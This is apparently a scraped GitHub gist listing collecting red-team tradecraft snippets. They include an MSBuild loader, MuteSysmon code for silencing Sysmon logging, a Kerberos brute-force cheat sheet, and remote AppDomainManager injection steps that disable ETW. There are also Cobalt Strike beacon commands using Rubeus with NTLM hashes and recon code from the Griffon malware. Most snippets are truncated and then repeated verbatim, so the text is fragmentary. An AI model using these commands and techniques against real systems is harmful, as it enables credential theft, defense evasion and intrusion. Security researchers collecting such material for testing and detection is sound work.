Lefteris Panos leftp

## Authproxyserver.ps1
#DISCLAIMER
#I'm not the original author of the script...
#Original git repo vanished

function String-to-ByteArray ($String)
{
	$ByteArray=@()
	For ( $i = 0; $i -lt ($String.Length/2); $i++ )
	{
		$Chars=$String.Substring($i*2,2)

## gist:8b9c8e0a2ad199da5e763343718233f8
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
	<Target Name="Hello" >

	<!-- Call ANY .NET API -->
	<!--

		Author: Casey Smith, Twitter: @subTee

		License: BSD 3-Clause


## WindowsExtensionMapCSVPlus.bat
@echo off
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²°
REM °² Enumerates all files extensions                  ²°
REM °² and what opens them on Windows 10 in batch/cmd   ²°
REM °² twitter: @ollieatnccgroup                        ²°
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²°


REM ------------------------------------------------------
REM

## MuteSysmon.cs
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Text;

namespace MuteSysmon
{
    class Program

## kerberos_attacks_cheatsheet.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                leftp
                / kerberos_attacks_cheatsheet.md
            
            
              Created
              July 20, 2020 11:32
                — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
            
              
                A cheatsheet with commands that can be used to perform kerberos attacks
              
          
    Kerberos cheatsheet

Bruteforcing

With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:

  
## README.md

      
              3 files
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                leftp
                / README.md
            
            
              Created
              September 1, 2020 17:36
                — forked from byt3bl33d3r/README.md
            
              
                Remote AppDomainManager Injection
              
          
    This is a variation of the technique originally discovered by subtee and described here
TL;DR It essentially allows you to turn any .NET application into a lolbin by providing a configuration file and specifying the <appDomainManagerAssembly> element pointing to a specially crafted .NET assembly which executes when the application is loaded.
This variation allows you to load the AppDomainManager assembly from a UNC path or HTTP(s) server. Also disables ETW thanks to the <etwEnable> element :)

Copy some binary you love to say, C:\Test. Lets use aspnet_compiler.exe as an example
Compile test.cs to test.dll with a signed strong name, this is required to load an assembly outside of a .NET applications base directory.
Host test.dll on a remote SMB or HTTP(S) server


## gist:1d812f71a92b3cff1593d9c6a7de8a62
##### IF ELEVATED:

# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH

# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi

# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter

## dnscanary_wmi
Dim dnsname
dnsname= "canary.troubleshootdomain.com"
Set wmi = GetObject("winmgmts:")
Set response = wmi.ExecQuery("Select * from Win32_PingStatus WHERE address='" & dnsname & "'")

## gist:adf34506b89acd06b830526760f33725
'' Griffon main actions start here.

Set file_system_object = CreateObject("Scripting.FileSystemObject")
temp_file_name = file_system_object.GetSpecialFolder(2) & "\" & file_system_object.GetTempName

' Start the detailed recon.
recon_info_str = get_network_adapter_info
network_info_str = ""
recon_info_str = recon_info_str & "SystemInfo" & "=" & get_system_info() & "&"
recon_info_str = recon_info_str & "SoftwareInfo" & "=" & get_product_or_process_info("Win32_Product") & "&"

## _Steps.md

      
              3 files
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                leftp
                / _Steps.md
            
            
              Created
              November 30, 2020 18:58
            
              
                Capbility Diffusion 101 - MsBuild Sets - Shellcode.exe spikes - Shellcode Horcrux if you like that analogy. 
              
          
1. Open PowerShell
2. Set MSbuild GodMode Env Variable 
   $env:MSBUILDENABLEALLPROPERTYFUNCTIONS = 1 
3. Execute C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe msbuild.png.xml
   Note: This "Serves" Shellcode in a memory mapped file. 
   This is no accessible to other processes. 
   Change in line 62 in shellcode.cs . Manual offsets just to troll you. :)
 I leave this for you to explore
	#DISCLAIMER
	#I'm not the original author of the script...
	#Original git repo vanished

	function String-to-ByteArray ($String)
	{
	$ByteArray=@()
	For ( $i = 0; $i -lt ($String.Length/2); $i++ )
	{
	$Chars=$String.Substring($i*2,2)
	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
	<Target Name="Hello" >

	<!-- Call ANY .NET API -->
	<!--

	Author: Casey Smith, Twitter: @subTee

	License: BSD 3-Clause
	@echo off
	REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²°
	REM °² Enumerates all files extensions ²°
	REM °² and what opens them on Windows 10 in batch/cmd ²°
	REM °² twitter: @ollieatnccgroup ²°
	REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²°


	REM ------------------------------------------------------
	REM
	using System;
	using System.Collections.Generic;
	using System.Diagnostics;
	using System.IO;
	using System.Linq;
	using System.Text;

	namespace MuteSysmon
	{
	class Program
	##### IF ELEVATED:

	# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
	beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH

	# decode the base64 blob to a binary .kirbi
	$ base64 -d ticket.b64 > ticket.kirbi

	# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
	beacon> make_token DOMAIN\USER PassWordDoesntMatter
	Dim dnsname
	dnsname= "canary.troubleshootdomain.com"
	Set wmi = GetObject("winmgmts:")
	Set response = wmi.ExecQuery("Select * from Win32_PingStatus WHERE address='" & dnsname & "'")
	'' Griffon main actions start here.

	Set file_system_object = CreateObject("Scripting.FileSystemObject")
	temp_file_name = file_system_object.GetSpecialFolder(2) & "\" & file_system_object.GetTempName

	' Start the detailed recon.
	recon_info_str = get_network_adapter_info
	network_info_str = ""
	recon_info_str = recon_info_str & "SystemInfo" & "=" & get_system_info() & "&"
	recon_info_str = recon_info_str & "SoftwareInfo" & "=" & get_product_or_process_info("Win32_Product") & "&"